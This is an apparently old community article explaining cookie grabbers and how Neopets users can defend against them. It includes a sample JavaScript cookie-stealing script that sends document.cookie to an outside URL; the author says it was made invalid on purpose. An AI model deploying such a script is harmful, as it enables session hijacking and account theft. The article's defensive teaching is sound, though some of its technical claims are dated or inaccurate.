Practical Defense Against Cookie Grabbers by Dor

Among all the scamming tricks, cookie grabbers are one of the most “effective” way to get people’s password illegally. And most of the time the victims don’t realize what happened until they lose their accounts. This article will help you to identify and defend yourself against the cookie grabbers.

I think I shall start with explaining what cookies in the computer world are. Cookies are text files that are stored in your computer by some websites. They help the website to recognize who you are, so you dont need to enter your login info and set your customizations every time you log on the internet. For example, if you choose remember my password in the PinkPT forums, several cookies will be produced and stored in your computer, containing your member id, password and miscellaneous information. You may worry that your family members can check your cookies to see your password, but basically it is impossible to read the cookies without a decoder as most of the codes are encrypted into strings meaningless to humans.

If you are using Internet Explorer, have a look at these folders to see the cookies stored in your computer:

Windows NT, 2000 and XP users: C:Documents and Settings<username>Cookies
Windows 98 and ME users: C:WindowsCookies

If you are using Mozilla Firefox, go to Tools>Options>Privacy. Click the “Stored Cookies…” buttons under “Cookies” to see them.

So what are cookie grabbers? Cookie grabbers are malicious scripts that retrieve the cookies that store your info of the other sites. They are usually called cookie stealers in the general computer world. The term cookie grabbers is not that common outside the neopian community. You may think that we should not be worrying about cookies being grabbed, as hackers cant read them anyway. But you forget one thing: hackers dont need your password to access your account. They can simply put the cookies into their cookie folders, log on the site, and do anything they want to do inside your account.

If you view the source code of an HTML document, you can easily recognize the cookie grabbing scripts. Below is a sample of a cookie grabber code.

Code:
<SCRIPT type=text/javascript>
function NabNabCookie(){
var nabCod = ‘height:0px; width:0px; resizable:no; help:no; scroll:no; status:no; font-size:expression(execScript(decodeURIComponent(“‘ + nabCon + ‘”)))’
var nabCon = encodeURIComponent(“document.write(“<IFRAME SRC=’http://www.pinkpt.com/grabs_cookies.php?out=” + document.cookie + “‘ WIDTH=1 HEIGHT=1>YUMMY YUMMY!!!</IFRAME>”); alert(document.cookie); “)
showModalDialog( “http://www.neopets.com”, null, nabCod); }
</SCRIPT>
<body onLoad=”NabNabCookie();”>

The code is for helping you to identify cookie grabbing scripts so pay attention to some of its script objects. I am not going to go deep into the code as this is not a script discussion board. Notice that the code is deliberately made to be invalid, so stop dreaming about luring the others to a site with this code and grab their cookies ;D.

Unless we are script addicts, we seldom bother to check the source code every time we visit a web page. So how can we know that our cookies are grabbed without seeing the source? Usually when the cookie grabbing script runs, a small window pops up and then disappears instantly. It is true that not all the flashy pop-ups are produced by the cookie grabbers. Nevertheless, it is always safer to check the source code when you come across them.

Dont panic if you unfortunately visited a cookie grabber site, and was wise enough to realize what the site had done to you. Go straight to the neopets Help centre, and change your password as quick as you can. If you suspect that it is not a neopet cookie grabber, but a Yahoo or Hotmail cookie stealer, change the passwords of those sites as well. You should also clear out the cookies in your computer immediately.

Of course we should not wait until the cookie grabbers catch us to take action. There are some precaution measures that can effectively reduce our chance of being cookie-grabbed.

– Do not trust any off-neopets web sites. Log out and clear out your cookies before visiting them
– If you have two browsers, use one for Neopets only and another one for other sites
– Be vigilant to scams. If someone persuades you to go to a link and claims that you can get blah blah blah, most likely the site contains cookie-grabbers
– Log out before shutting down your computer. This can prevent the leakage of your personal information even if your family members accidentally visit cookie grabbing sites.
– Always check the Windows Update for new patches, especially those which are related to internet security
– Have an anti-virus program installed in your computer. You may consider downloading some free anti-virus programmes: Zone Alarm and AVG Anti-virus

There are also some optional measures that can enhance the security of your browser. If you are using Internet Explorer 6.0, go to Tools>Internet Options>Privacy and move the slider up. You can also click Advanced for specialized cookie treatments.

If you are using Mozilla Firefox 0.9.2, Go to Tools>Options>Privacy. Make suitable cookie settings there. I think it is a good idea to use the alert features when accepting cookies (provide that you are not afraid of troubles). Also, remember to tick “for the originating Web site only”. This is a useful option that prevents sites from retrieving cookies that are not stored by them, thus completely blocks the cookie grabbers.

Lastly, here is a mini “cookie grabber” for fun. Well, it is not really those who grabs the cookies of the others. Instead it grabs the cookies that a certain site stores in your computer. Paste the code into the address bar and you can see the cookies PinkPT secretly injected into our computers! You may bookmark the code for convenience in checking the stored cookies in other sites.

Code:
javascript:alert(‘Cookies created by this web document:nn’ + document.cookie.replace(/; /g,’n’)); – Dor